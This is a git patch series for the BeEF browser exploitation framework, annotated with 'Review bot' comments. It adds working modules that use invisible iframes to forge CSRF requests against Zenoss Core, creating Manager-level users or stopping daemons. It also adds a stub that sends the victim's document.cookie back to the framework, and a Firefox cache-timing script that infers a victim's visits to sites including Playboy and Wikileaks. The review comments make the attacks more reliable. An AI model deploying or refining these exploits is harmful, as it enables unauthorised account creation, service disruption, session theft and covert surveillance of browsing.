From 11870710e8c5290be1c649b28d4b1f9552c013a3 Mon Sep 17 00:00:00 2001 From: bcoles Date: Wed, 7 Mar 2012 15:02:12 +1030 Subject: [PATCH 1/9] Added a couple of 0day CSRF exploits for Zenoss Core <= 3.2.1 --- .../exploits/zenoss_add_user_csrf/command.js | 33 +++++++++ .../exploits/zenoss_add_user_csrf/config.yaml | 25 +++++++ .../exploits/zenoss_add_user_csrf/module.rb | 46 ++++++++++++ .../exploits/zenoss_daemon_csrf/command.js | 32 +++++++++ .../exploits/zenoss_daemon_csrf/config.yaml | 25 +++++++ modules/exploits/zenoss_daemon_csrf/module.rb | 70 +++++++++++++++++++ 6 files changed, 231 insertions(+) create mode 100644 modules/exploits/zenoss_add_user_csrf/command.js create mode 100644 modules/exploits/zenoss_add_user_csrf/config.yaml create mode 100644 modules/exploits/zenoss_add_user_csrf/module.rb create mode 100644 modules/exploits/zenoss_daemon_csrf/command.js create mode 100644 modules/exploits/zenoss_daemon_csrf/config.yaml create mode 100644 modules/exploits/zenoss_daemon_csrf/module.rb diff --git a/modules/exploits/zenoss_add_user_csrf/command.js b/modules/exploits/zenoss_add_user_csrf/command.js new file mode 100644 index 000000000..9650a2684 --- /dev/null +++ b/modules/exploits/zenoss_add_user_csrf/command.js 
@@ -0,0 +1,33 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+ var base = '<%= @base %>';
+ var user_level = '<%= @user_level %>';
+ var username = '<%= @username %>';
+ var password = '<%= @password %>';
+
+ var zenoss_add_user_iframe = beef.dom.createInvisibleIframe();
+ zenoss_add_user_iframe.setAttribute('src', base+'/zport/dmd/ZenUsers?tableName=userlist&zenScreenName=manageUserFolder.pt&manage_addUser%3Amethod=OK&defaultAdminRole='+user_level+'&roles%3Alist='+user_level+'&userid='+username+'&password='+password);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(zenoss_add_user_iframe);
+ }
+ setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/zenoss_add_user_csrf/config.yaml b/modules/exploits/zenoss_add_user_csrf/config.yaml
new file mode 100644
index 000000000..3ae083e7a
--- /dev/null
+++ b/modules/exploits/zenoss_add_user_csrf/config.yaml
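Review bot: The operator-supplied username, password and user_level are concatenated into the iframe URL without encoding, so a password containing '&', '#', '+' or a space silently truncates or corrupts the forged manage_addUser request while the module still reports "result=exploit attempted". Wrap each value, e.g. `'&userid='+encodeURIComponent(username)+'&password='+encodeURIComponent(password)` (and likewise both user_level occurrences); the same values are also dropped into single-quoted JS literals by ERB, so a quote in the password breaks the script itself. Separately, `cleanup` is an implicit global run through string-eval `setTimeout("cleanup()", 15000)`; the daemon module in this same patch assigns the same name, so if both run within 15 s one iframe is never removed — prefer `setTimeout(function(){ document.body.removeChild(zenoss_add_user_iframe); }, 15000);`. Since the iframe is cross-origin the module has no success signal; the fixed result string should say "attempted, not verified".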
@@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + zenoss_add_user_csrf: + enable: true + category: "Exploits" + name: "Zenoss Add User CSRF" + description: "Attempts to add a user to a Zenoss Core <= 3.2.1 server." + authors: ["bcoles"] + target: + working: ["ALL"] diff --git a/modules/exploits/zenoss_add_user_csrf/module.rb b/modules/exploits/zenoss_add_user_csrf/module.rb new file mode 100644 index 000000000..28fac6d60 --- /dev/null +++ b/modules/exploits/zenoss_add_user_csrf/module.rb 
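Review bot: The description omits the precondition that makes or breaks this module: the forged GET only does anything if the hooked browser currently holds an authenticated Zenoss session with rights to add users, and command.js cannot observe whether it worked. Suggest `description: "Attempts to add a user to a Zenoss Core <= 3.2.1 server via CSRF. Requires the hooked browser to be logged in to Zenoss with user-management rights; success is not verified."`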
@@ -0,0 +1,46 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Zenoss_add_user_csrf < BeEF::Core::Command
+
+ def self.options
+ return [
+ { 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'},
+ { 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'},
+ { 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'},
+ { 'name' => 'user_level',
+ 'type' => 'combobox',
+ 'ui_label' => 'User Level',
+ 'store_type' => 'arraystore',
+ 'store_fields' => ['user_level'],
+ 'store_data' => [
+ ['Manager'],
+ ['ZenManager'],
+ ['ZenUser']
+ ],
+ 'emptyText' => 'Select a user level ("Manager" is highest)',
+ 'valueField' => 'user_level',
+ 'displayField' => 'user_level',
+ 'mode' => 'local',
+ 'autoWidth' => true
+ },
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/zenoss_daemon_csrf/command.js b/modules/exploits/zenoss_daemon_csrf/command.js
new file mode 100644
index 000000000..4b753f8ea
--- /dev/null
+++ b/modules/exploits/zenoss_daemon_csrf/command.js
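Review bot: The default `base` value `http://192.168.1.1:8080/` ends with a slash while command.js appends `/zport/dmd/ZenUsers...`, so the forged URL contains `//zport`; Zope may tolerate that, but a reverse proxy in front of it may not. Change the default to `'value' => 'http://192.168.1.1:8080'` and make the label say so, e.g. `'ui_label' => 'Zenoss web root (no trailing slash)'`, or strip the slash in command.js before concatenating. The default credentials `username`/`password` will also be exactly what gets created on the target if the operator forgets to change them.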
@@ -0,0 +1,32 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+ var base = '<%= @base %>';
+ var service = '<%= @service %>';
+ var action = '<%= @action %>';
+
+ var zenoss_daemon_iframe = beef.dom.createInvisibleIframe();
+ zenoss_daemon_iframe.setAttribute('src', base+'/zport/About?action='+action+'&daemon='+service+'&manage_daemonAction%3Amethod='+action);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(zenoss_daemon_iframe);
+ }
+ setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/zenoss_daemon_csrf/config.yaml b/modules/exploits/zenoss_daemon_csrf/config.yaml
new file mode 100644
index 000000000..9249f7d99
--- /dev/null
+++ b/modules/exploits/zenoss_daemon_csrf/config.yaml
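Review bot: `cleanup` is assigned as an implicit global and invoked by string-eval in `setTimeout("cleanup()", 15000)`, and the zenoss_add_user_csrf module added in this same patch assigns the identical global; if both modules run within 15 s of each other, the later assignment wins and one of the two hidden iframes is never removed from the hooked page. Replace the pair of lines with `setTimeout(function(){ document.body.removeChild(zenoss_daemon_iframe); }, 15000);` so each module owns its own closure. `service` and `action` are only combobox values today, so the unencoded concatenation into the URL is harmless, but `encodeURIComponent` would keep that true if the options ever become free text.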
@@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + zenoss_daemon_csrf: + enable: true + category: "Exploits" + name: "Zenoss Daemon CSRF" + description: "Attempts to start/stop/restart daemons on a Zenoss Core <= 3.2.1 server." + authors: ["bcoles"] + target: + working: ["ALL"] diff --git a/modules/exploits/zenoss_daemon_csrf/module.rb b/modules/exploits/zenoss_daemon_csrf/module.rb new file mode 100644 index 000000000..148f0c6bf --- /dev/null +++ b/modules/exploits/zenoss_daemon_csrf/module.rb 
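Review bot: The description should warn about the blast radius: the daemon list in module.rb includes `zopectl`, described there as the Zope web application server, and `zeoctl`, its object database, so a Stop or Restart of either presumably takes down the Zenoss web interface itself — including whatever session the hooked browser was using — which makes this a denial-of-service action rather than a quiet one. Suggest `description: "Attempts to start/stop/restart a Zenoss daemon on a Zenoss Core <= 3.2.1 server via CSRF. Requires the hooked browser to be logged in to Zenoss as an administrator; stopping zopectl/zeoctl disables the Zenoss web UI."`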
@@ -0,0 +1,70 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Zenoss_daemon_csrf < BeEF::Core::Command + + def self.options + return [ + { 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'}, + { 'name' => 'service', + 'type' => 'combobox', + 'ui_label' => 'Daemon', + 'store_type' => 'arraystore', + 'store_fields' => ['service', 'description'], + 'store_data' => [ + ['zeoctl', 'zeoctl (Zope Enterprise Objects server - shares database between Zope instances)'], + ['zopectl', 'zopectl (The Zope open source web application server)'], + ['zenhub', 'zenhub (Broker between the data layer and the collection daemons)'], + ['zenjobs', 'zenjobs (Zenjobs)'], + ['zenping', 'zenping (ICMP ping status monitoring)'], + ['zensyslog', 'zensyslog (Collection of and classification of syslog events)'], + ['zenstatus', 'zenstatus (Active TCP connection testing of remote daemons)'], + ['zenactions', 'zenactions (Alerts - SMTP, SNPP and Maintenance Windows)'], + ['zentrap', 'zentrap (Receives SNMP traps and turns them into events)'], + ['zenmodeler', 'zenmodeler (Configuration collection and configuration)'], + ['zenperfsnmp', 'zenperfsnmp (High performance asynchronous SNMP performance collection)'], + ['zencommand', 'zencommand (Runs plug-ins on the local box or on remote boxes through SSH)'], + ['zenprocess', 'zenprocess (Process monitoring using SNMP host resources MIB)'], + ['zenwin', 
'zenwin (Windows Service Monitoring (WMI))'], + ['zeneventlog', 'zeneventlog (Collect (WMI) event log events (aka NT Eventlog))'], + ['zenjmx', 'zenjmx (ZenJMX)'] + ], + 'emptyText' => 'Select a daemon', + 'valueField' => 'service', + 'displayField' => 'service', #'description', + 'mode' => 'local', + 'autoWidth' => true + }, + { 'name' => 'action', + 'type' => 'combobox', + 'ui_label' => 'Action', + 'store_type' => 'arraystore', + 'store_fields' => ['action'], + 'store_data' => [ + ['Start'],['Stop'],['Restart'] + ], + 'valueField' => 'action', + 'displayField' => 'action', + 'mode' => 'local', + 'autoWidth' => true + } + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end From 05b7eab56cc306009aab0d99eb55f9ba8897cfed Mon Sep 17 00:00:00 2001 From: asaafan Date: Fri, 9 Mar 2012 01:46:11 +0200 Subject: [PATCH 2/9] Delete Skype XSS stub from main branch From ea199f5c552e516ab64112222704c55454c1b7f5 Mon Sep 17 00:00:00 2001 From: unknown Date: Fri, 9 Mar 2012 01:38:37 +0200 Subject: [PATCH 3/9] Adding stub for Skype XSS module --- modules/exploits/skype_xss/command.js | 21 +++++++++++++++++++++ modules/exploits/skype_xss/config.yaml | 25 +++++++++++++++++++++++++ modules/exploits/skype_xss/module.rb | 24 ++++++++++++++++++++++++ 3 files changed, 70 insertions(+) create mode 100644 modules/exploits/skype_xss/command.js create mode 100644 modules/exploits/skype_xss/config.yaml create mode 100644 modules/exploits/skype_xss/module.rb diff --git a/modules/exploits/skype_xss/command.js b/modules/exploits/skype_xss/command.js new file mode 100644 index 000000000..7f0049186 --- /dev/null +++ b/modules/exploits/skype_xss/command.js 
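Review bot: `'displayField' => 'service', #'description',` leaves commented-out code behind and means the second column of `store_data` — the per-daemon descriptions — is never shown to the operator, so the data is dead weight in the UI. Either commit to the descriptions (`'displayField' => 'description'`, which also tells the operator what they are about to stop) or drop the second column and `'store_fields' => ['service']`. The `base` default `http://192.168.1.1:8080/` has the same trailing-slash problem as the add_user module: command.js appends `/zport/About`, producing `//zport`.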
@@ -0,0 +1,21 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie); + +}); + diff --git a/modules/exploits/skype_xss/config.yaml b/modules/exploits/skype_xss/config.yaml new file mode 100644 index 000000000..fb92775eb --- /dev/null +++ b/modules/exploits/skype_xss/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + get_cookie: + enable: true + category: "Browser" + name: "Get Cookie" + description: "This module will retrieve the session cookie from the current page." + authors: ["bcoles"] + target: + working: ["ALL"] diff --git a/modules/exploits/skype_xss/module.rb b/modules/exploits/skype_xss/module.rb new file mode 100644 index 000000000..ba0fc1350 --- /dev/null 
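Review bot: The config registers this module under the key `get_cookie` with name "Get Cookie" and a description about retrieving the session cookie — metadata copied verbatim from another module rather than describing a Skype XSS exploit. If a get_cookie module already exists in the tree, loading a second one under the same key is presumably a conflict, and even as a stub it should be identifiable: `skype_xss:` with `name: "Skype XSS"` and `enable: false` until it does something. The directory is `modules/exploits/` while `category` says "Browser"; pick one.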
+++ b/modules/exploits/skype_xss/module.rb @@ -0,0 +1,24 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Get_cookie < BeEF::Core::Command + + def post_execute + content = {} + content['cookie'] = @datastore['cookie'] + save content + end + +end From 76e881dce932d9ceb2611a19dce090edaff27d97 Mon Sep 17 00:00:00 2001 From: asaafan Date: Fri, 9 Mar 2012 01:53:07 +0200 Subject: [PATCH 4/9] Delete Skype XSS stub from main branch --- modules/exploits/skype_xss/command.js | 21 --------------------- modules/exploits/skype_xss/config.yaml | 25 ------------------------- modules/exploits/skype_xss/module.rb | 24 ------------------------ 3 files changed, 70 deletions(-) delete mode 100644 modules/exploits/skype_xss/command.js delete mode 100644 modules/exploits/skype_xss/config.yaml delete mode 100644 modules/exploits/skype_xss/module.rb diff --git a/modules/exploits/skype_xss/command.js b/modules/exploits/skype_xss/command.js deleted file mode 100644 index 7f0049186..000000000 --- a/modules/exploits/skype_xss/command.js +++ /dev/null 
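Review bot: The class is declared as `Get_cookie`, the same constant the config's `get_cookie` metadata points at; if the framework also loads the existing get_cookie module, Ruby reopens the class and whichever `post_execute` is defined last silently wins. Name it after its directory, `class Skype_xss < BeEF::Core::Command`, so the stub cannot shadow a working module. (The later commit in this series removes the stub entirely, which resolves it for now.)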
@@ -1,21 +0,0 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -beef.execute(function() { - - beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie); - -}); - diff --git a/modules/exploits/skype_xss/config.yaml b/modules/exploits/skype_xss/config.yaml deleted file mode 100644 index fb92775eb..000000000 --- a/modules/exploits/skype_xss/config.yaml +++ /dev/null @@ -1,25 +0,0 @@ -# -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -beef: - module: - get_cookie: - enable: true - category: "Browser" - name: "Get Cookie" - description: "This module will retrieve the session cookie from the current page." - authors: ["bcoles"] - target: - working: ["ALL"] diff --git a/modules/exploits/skype_xss/module.rb b/modules/exploits/skype_xss/module.rb deleted file mode 100644 index ba0fc1350..000000000 
--- a/modules/exploits/skype_xss/module.rb +++ /dev/null @@ -1,24 +0,0 @@ -# -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -class Get_cookie < BeEF::Core::Command - - def post_execute - content = {} - content['cookie'] = @datastore['cookie'] - save content - end - -end From f2401d3f39b52125b789564a25c24634a531f5cf Mon Sep 17 00:00:00 2001 From: Keith Lee Date: Fri, 9 Mar 2012 03:16:26 +0800 Subject: [PATCH 5/9] Issue 86 - Working for Firefox. Support for Chrome+Opera+IE still pending. --- modules/browser/get_history/command.js | 233 ++++++++++++++++++++++++ modules/browser/get_history/config.yaml | 25 +++ modules/browser/get_history/module.rb | 24 +++ 3 files changed, 282 insertions(+) create mode 100644 modules/browser/get_history/command.js create mode 100644 modules/browser/get_history/config.yaml create mode 100644 modules/browser/get_history/module.rb diff --git a/modules/browser/get_history/command.js b/modules/browser/get_history/command.js new file mode 100644 index 000000000..d3ffcc482 --- /dev/null +++ b/modules/browser/get_history/command.js 
@@ -0,0 +1,233 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// + + +var hidden_iframe = beef.dom.createInvisibleIframe(); +hidden_iframe.setAttribute('id','f'); +hidden_iframe.setAttribute('name','f'); +hidden_iframe.setAttribute('src','about:blank'); +hidden_iframe.setAttribute('style','opacity: 0.1'); + +var results = ""; +var tries = 0; + +/******************************* + * SUB-MS TIMER IMPLEMENTATION * + *******************************/ +var cycles = 0; +var exec_next = null; + +function timer_interrupt() { + cycles++; + if (exec_next) { + var cmd = exec_next; + exec_next = null; + cmd(); + } +} + +window.addEventListener('message', timer_interrupt, false); + +function sched_call(fn) { + exec_next = fn; + window.postMessage('123', '*'); +} + +/**************** + * SCANNED URLS * + ****************/ +var targets = [ + { 'category': 'Social networks' }, + { 'name': 'Facebook', 'urls': [ 'https://s-static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js', + 'http://static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js', + 'http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HN0ehA1zox_.js' ] }, + { 'name': 'Google Plus', 'urls': [ 'https://ssl.gstatic.com/gb/js/abc/gcm_57b1882492d4d0138a0a7ea7240394ca.js' ] }, + + { 'name': 'Dogster', 'urls': [ 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js.gz', + 
'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js' ] }, + { 'name': 'MySpace', 'urls': [ 'http://x.myspacecdn.com/modules/common/static/css/futuraglobal_kqj36l0b.css' ] }, + { 'category': 'Content platforms' }, + { 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/cssbin/www-refresh-vflMpNCTQ.css' ] }, + { 'name': 'Hulu', 'urls': [ 'http://static.huluim.com/system/hulu_0cd8f497_1.css' ] }, + { 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/css/c_fold_main.css.v109886.64777.105425.23' ] }, + { 'name': 'JustinBieberMusic.com', 'urls': [ 'http://www.justinbiebermusic.com/underthemistletoe/js/fancybox.js' ] }, + { 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/styles.css' /* 4h */ ] }, + { 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/squelettes/jquery-1.6.4.min.js' ] }, + { 'category': 'Online media' }, + { 'name': 'New York Times', 'urls': [ 'http://js.nyt.com/js2/build/sitewide/sitewide.js' ] }, + { 'name': 'CNN', 'urls': [ 'http://z.cdn.turner.com/cnn/tmpl_asset/static/www_homepage/835/css/hplib-min.css', + 'http://z.cdn.turner.com/cnn/tmpl_asset/static/intl_homepage/564/css/intlhplib-min.css' ] }, + { 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/reddit.en-us.xMviOWUyZqo.js' ] }, + { 'name': 'Slashdot', 'urls': [ 'http://a.fsdn.com/sd/classic.css?release_20111207.02' ] }, + { 'name': 'Fox News', 'urls': [ 'http://www.fncstatic.com/static/all/css/head.css?1' ] }, + { 'name': 'AboveTopSecret.com', 'urls': [ 'http://www.abovetopsecret.com/forum/ats-scripts.js' ] }, + { 'category': 'Commerce' }, + { 'name': 'Diapers.com', 'urls': [ 'http://c1.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12', + 'http://c3.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12' ] }, + { 'name': 'Expedia', 'urls': [ 'http://www.expedia.com/static/default/default/scripts/expedia/core/e.js?v=release-2011-11-r4.9.317875' ] }, + { 'name': 'Amazon (US)', 'urls': [ 
'http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-css-quirks/site-wide-3527593236.css._V162874846_.css' ] }, + { 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/CSS/template.v1.w.5723.0.css' ] }, + { 'name': 'eBay', 'urls': [ 'http://ir.ebaystatic.com/v4js/z/io/gbsozkl4ha54vasx4meo3qmtw.js' ] } +]; + + +/************************* + * CONFIGURABLE SETTINGS * + *************************/ +var TIME_LIMIT = 5; +var MAX_ATTEMPTS = 2; + +/********************** + * MAIN STATE MACHINE * + **********************/ +var log_area; +var target_off = 0; +var attempt = 0; +var confirmed_visited = false; +var current_url, current_name; +var wait_cycles; +var frame_ready = false; +var start, stop, urls; + +/* The frame was just pointed to data:... at this point. Initialize a new test, giving the + frame some time to fully load. */ +function perform_check() { + wait_cycles = 0; + setTimeout(wait_for_read, 1); +} + + +/* Confirm that data:... is loaded correctly. */ +function wait_for_read() { + if (wait_cycles++ > 100) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry'); + return; + } + if (!frame_ready) { + setTimeout(wait_for_read, 1); + } else { + document.getElementById('f').contentWindow.stop(); + setTimeout(navigate_to_target, 1); + } +} + + +/* Navigate the frame to the target URL. */ +function navigate_to_target() { + cycles = 0; + sched_call(wait_for_noread); + urls++; + document.getElementById("f").src = current_url; +} + +/* The browser is now trying to load the destination URL. Let's see if + we lose SOP access before we hit TIME_LIMIT. If yes, we have a cache + hit. If not, seems like cache miss. In both cases, the navigation + will be aborted by maybe_test_next(). 
*/ + +function wait_for_noread() { + try { + if (document.getElementById('f').contentWindow.location.href == undefined) + { + confirmed_visited = true; + throw 1; + } + if (cycles >= TIME_LIMIT) { + maybe_test_next(); + return; + } + sched_call(wait_for_noread); + } catch (e) { + confirmed_visited = true; + maybe_test_next(); + } +} + + +/* Just a logging helper. */ +function log_text(str, type, cssclass) { + results+="
"; + results+=str; + if(target_off==(targets.length-1)){ + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+results); + setTimeout(reload,5000); + } +} + +function reload(){ + window.location.reload(); +} + +/* Decides what to do next. May schedule another attempt for the same target, + select a new target, or wrap up the scan. */ + +function maybe_test_next() { + + frame_ready = false; + document.getElementById('f').src = 'data:text/html,'; + if (target_off < targets.length) { + if (targets[target_off].category) { + //log_text(targets[target_off].category + ':', 'p', 'category'); + target_off++; + } + if (confirmed_visited) { + log_text('Visited: ' + current_name + ' [' + cycles + ':' + attempt + ']', 'li', 'visited'); + } + if (confirmed_visited || attempt == MAX_ATTEMPTS * targets[target_off].urls.length) { + if (!confirmed_visited) + //continue; + log_text('Not visited: ' + current_name + ' [' + cycles + '+]', 'li', 'not_visited'); + confirmed_visited = false; + target_off++; + attempt = 0; + maybe_test_next(); + } else { + current_url = targets[target_off].urls[attempt % targets[target_off].urls.length]; + current_name = targets[target_off].name; + attempt++; + perform_check(); + } + } //else { + //en = (new Date()).getTime(); + //} +} + +/* The handler for "run the test" button on the main page. Dispenses + advice, resets state if necessary. 
*/ +function start_stuff() { + if (navigator.userAgent.indexOf('Firefox/') == -1) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox, and probably won\'t work for you.'); + //alert('This proof-of-concept is specific to Firefox, and probably won\'t work for you.\n\n' + + // 'Versions for other browsers can be found here:\n' + + // 'http://lcamtuf.coredump.cx/cachetime/'); + } + else{ + target_off = 0; + attempt = 0; + confirmed_visited = false; + urls = 0; + results = ""; + maybe_test_next(); + } +} + +beef.execute(function() { + urls = undefined; + exec_next = null; + start_stuff(); +}); + + diff --git a/modules/browser/get_history/config.yaml b/modules/browser/get_history/config.yaml new file mode 100644 index 000000000..3cb2ea648 --- /dev/null +++ b/modules/browser/get_history/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + get_history: + enable: true + category: "Browser" + name: "History Extraction" + description: "This module will retrieve the session cookie from the current page." + authors: ["keith_lee @keith55 http://milo2012.wordpress.com"] + target: + working: ["FF"] diff --git a/modules/browser/get_history/module.rb b/modules/browser/get_history/module.rb new file mode 100644 index 000000000..be20141df --- /dev/null +++ b/modules/browser/get_history/module.rb 
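Review bot: `log_text` ends the scan with `setTimeout(reload,5000)`, and `reload()` calls `window.location.reload()` on the hooked page — a visible side effect on the victim that, depending on how the hook was delivered, may discard the hooked browser entirely; the results were already sent by `beef.net.send` on the line above, so the reload buys nothing. Drop `setTimeout(reload,5000)` and `reload`, and instead remove `hidden_iframe` from the DOM once the last target is logged. The `wait_for_read` timeout path sends "Something went wrong" and returns without clearing the iframe either, so both exits leave state behind. Unlike the other modules, the iframe creation and all helper definitions run at script top level rather than inside `beef.execute`, so they execute as soon as the command is evaluated; that is worth a one-line comment if it is intentional. Results are also reported only when `target_off==(targets.length-1)`, so a target appended later without being last would silently change when the report fires.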
